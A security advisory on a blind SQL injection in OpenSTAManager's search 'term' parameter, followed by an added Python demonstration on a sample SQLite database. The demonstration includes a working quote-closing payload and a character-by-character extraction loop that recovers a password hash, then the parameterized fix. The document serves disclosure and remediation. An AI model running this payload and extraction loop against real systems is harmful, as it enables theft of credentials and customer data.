devcode-it/openstamanager
cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*
- <= 2.9.8
A critical time-based blind SQL injection vulnerability has been identified in the global search feature of OpenSTAManager (affected versions are listed above). The application does not adequately sanitize the 'term' parameter before concatenating it into SQL LIKE clauses in the module-specific search handlers. An authenticated attacker can therefore inject arbitrary SQL and, using time-based Boolean inference, extract sensitive data such as password hashes, customer information, and financial records. The affected modules include Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, and Interventi.
Successful exploitation allows complete database exfiltration, including customer personal information, financial records, and business secrets; password hashes can be extracted for offline cracking. Because every probe makes the database wait, the attack also degrades availability: each injected request is reported to consume roughly 85 times the server resources of a normal request, enough to cause 504 Gateway Time-out errors.
To reproduce, log into the application and send a request to the '/ajax_search.php' endpoint with a SQL payload in the 'term' parameter. Because the parameter lands inside a quoted LIKE pattern, the payload has to close that string before appending its own condition. Including a time-based function such as SLEEP() in the payload produces a measurable delay in the response, which confirms the injection; compare against a baseline request with a benign term so that ordinary server latency is not mistaken for a successful probe.
To address this vulnerability, replace every direct concatenation of the 'term' parameter into a SQL query with a prepared statement via the 'prepare()' method, in every affected module. Since the value is used as a LIKE pattern, also escape the wildcards '%' and '_' in user input: parameterization stops the injection, but on its own it does not stop a user-supplied wildcard from widening the match.
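The following is an added example, not code from OpenSTAManager or from the advisory, illustrating both the reproduction described above and the fix. It uses an in-memory SQLite database with assumed table and column names (zz_users, mg_articoli, descrizione) and constructed sample rows; SQLite has no SLEEP(), so the Boolean oracle here is whether the search returns any rows rather than a delay, but the character-by-character inference loop is the same one a time-based attack runs. The vulnerable handler concatenates the term into a LIKE clause; the hardened handler binds it as a parameter and escapes LIKE wildcards.

```python
import sqlite3

# Constructed sample data standing in for an OpenSTAManager database. Table and
# column names are assumptions for illustration, not the project's real schema.
SAMPLE_USERS = [("admin", "$2y$10$abcDEF"), ("mario", "$2y$10$xyzGHI")]
SAMPLE_ARTICLES = ["Widget A", "Widget B", "Gadget"]

# Characters that can appear in a bcrypt hash; the inference loop tries each in turn.
HASH_ALPHABET = "./$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def build_db():
    """Create the in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zz_users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE mg_articoli (descrizione TEXT)")
    conn.executemany("INSERT INTO zz_users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO mg_articoli VALUES (?)", [(a,) for a in SAMPLE_ARTICLES])
    return conn


def search_vulnerable(conn, term):
    """The flaw described above: the raw search term is spliced into a LIKE clause."""
    sql = "SELECT descrizione FROM mg_articoli WHERE descrizione LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term):
    """Neutralise LIKE metacharacters so a user-supplied % or _ cannot widen the match."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_fixed(conn, term):
    """Hardened handler: the term is bound as a parameter, never concatenated."""
    sql = "SELECT descrizione FROM mg_articoli WHERE descrizione LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escape_like(term) + "%",))]


def oracle_payload(position, char):
    """Search term that closes the LIKE string and tests one character of the admin hash.

    The trailing  AND '%'='  re-balances the quotes once the vulnerable handler
    appends its own  %'  so the statement stays syntactically valid.
    """
    return ("' AND SUBSTR((SELECT password FROM zz_users WHERE username='admin'),"
            f"{position},1)='{char}' AND '%'='")


def extract_admin_hash(search, max_length, alphabet=HASH_ALPHABET):
    """Blind Boolean inference: one query per candidate character per position.

    With a time-based oracle the condition would be wrapped in SLEEP(); here the
    oracle is simply whether any rows come back. Stops when no candidate matches,
    which is what happens one position past the end of the hash.
    """
    recovered = ""
    for position in range(1, max_length + 1):
        for ch in alphabet:
            if search(oracle_payload(position, ch)):
                recovered += ch
                break
        else:
            return recovered
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler leaks:", extract_admin_hash(lambda t: search_vulnerable(db, t), 80))
    print("fixed handler leaks:     ", repr(extract_admin_hash(lambda t: search_fixed(db, t), 80)))
```

Run against the vulnerable handler the loop recovers the admin hash one character at a time; against the fixed handler the same payloads are treated as literal text and the loop terminates at the first position with nothing recovered. The escape_like step is what makes a bare '%' term return nothing under the fixed handler instead of every row.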